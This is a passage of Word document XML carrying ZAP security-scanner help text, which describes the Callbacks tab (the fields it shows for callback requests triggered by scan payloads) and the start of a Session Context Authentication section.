    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="5B7E3146" w14:textId="6D2D2C6B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7B8460F5" w:rsidP="449E37A7" w:rsidRDefault="7B8460F5" w14:paraId="341CB61A" w14:textId="0893497C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="7B8460F5">
        <w:drawing>
          <wp:inline wp14:editId="09B9ED75" wp14:anchorId="77E3BE88">
            <wp:extent cx="4572000" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="271788899" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rb2dbb0b0ebc34175">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="876300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="7C7C80A9" w14:textId="3CD3B46F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="765A9313" w14:textId="538A6880">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="72DEA95F" w:rsidP="55820FFD" w:rsidRDefault="72DEA95F" w14:paraId="3FB92F1B" w14:textId="5DB0F321">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Callbacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="72DEA95F" w:rsidP="55820FFD" w:rsidRDefault="72DEA95F" w14:paraId="766AF106" w14:textId="3B0BBC06">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pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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 xml:space="preserve">Various ZAP components (scan rules, </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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etc</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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 xml:space="preserve">) may </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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leverage</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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 xml:space="preserve"> payloads which result in HTTP requests back to ZAP. Such callback requests may be triggered by the spider(s), a user, or a future action from a tertiary system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="72DEA95F" w:rsidP="55820FFD" w:rsidRDefault="72DEA95F" w14:paraId="785D0772" w14:textId="2A5D1734">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pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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 xml:space="preserve">The ZAP </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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 xml:space="preserve"> includes a panel in which such requests can be reviewed: </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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Callbacks tab</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="72DEA95F" w:rsidP="55820FFD" w:rsidRDefault="72DEA95F" w14:paraId="72CBD6B0" w14:textId="76D4D169">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Callbacks tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="72DEA95F" w:rsidP="55820FFD" w:rsidRDefault="72DEA95F" w14:paraId="01A4381A" w14:textId="242D93D6">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="of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pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="72DEA95F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This tab shows a summary of the callback requests ZAP has received. For each callback you can see:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="375"/>
        <w:gridCol w:w="8985"/>
      </w:tblGrid>
      <w:tr w:rsidR="55820FFD" w:rsidTr="55820FFD" w14:paraId="4819FDAC">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="375" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="0DA2D8BC" w14:textId="52B054FA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8985" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="01C2CD2C" w14:textId="59EEC33E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="55820FFD" w:rsidTr="55820FFD" w14:paraId="04C13FAA">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="375" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="1E70DA97" w14:textId="5F58789A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8985" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="75DD5335" w14:textId="22097471">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color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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An Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="55820FFD" w:rsidTr="55820FFD" w14:paraId="797D1B6B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="375" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="7D1B1AF9" w14:textId="6871AE56">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8985" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="1B616B75" w14:textId="40E7D771">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color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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The Timestamp of the received request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="55820FFD" w:rsidTr="55820FFD" w14:paraId="68763A2B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="375" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="5BC52355" w14:textId="6009F37D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8985" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="7519227B" w14:textId="69A07E99">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color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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The Method associated with the request (GET, POST, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="55820FFD" w:rsidTr="55820FFD" w14:paraId="20678663">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="375" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="2B12032A" w14:textId="12B1E6F0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8985" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="5F5F0563" w14:textId="4D70B77C">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color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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The URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="55820FFD" w:rsidTr="55820FFD" w14:paraId="73AC3577">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="375" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="4B49D44E" w14:textId="4F2657D7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8985" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="7F0451E7" w14:textId="7F46867B">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color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">The Handler - The ZAP </w:t>
            </w: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component</w:t>
            </w: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 xml:space="preserve"> which caught or responded to the callback request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="55820FFD" w:rsidTr="55820FFD" w14:paraId="23C7C5E0">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="375" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="5C020BE6" w14:textId="1C1FF5BC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8985" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="3007A245" w14:textId="0739D95A">
            <w:p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color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">The </w:t>
            </w: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referer</w:t>
            </w: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 xml:space="preserve"> (if one was included in the request, Ex: the URL on which the payload was </w:t>
            </w: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encountered</w:t>
            </w:r>
            <w:r w:rsidRPr="55820FFD" w:rsidR="55820FFD">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="444444"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="7752B917" w14:textId="5A88BD20">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="05923D42" w14:textId="255413DA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="543C322F" w14:textId="51DAA54A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="0F9B7FD2" w14:textId="02B4A9B8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="04D5C33B" w14:textId="4C7B9A20">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="077BEAD8" w14:textId="5EFBC9F8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="45529BE8" w14:textId="431A7E51">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="0773CABB" w14:textId="0BAC68D5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="35E93148" w14:textId="2FA3AB6D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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Session Context Authentication screen  </w:t>
      </w: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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="4209B8AB" w14:textId="524C160B">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This is one of the Session Context screens which allows you to manage the way in which Authentication is being done for the Context</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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4E1D9B4F" w14:textId="06764F99">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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Authentication Method  </w:t>
      </w:r>
    </w:p>
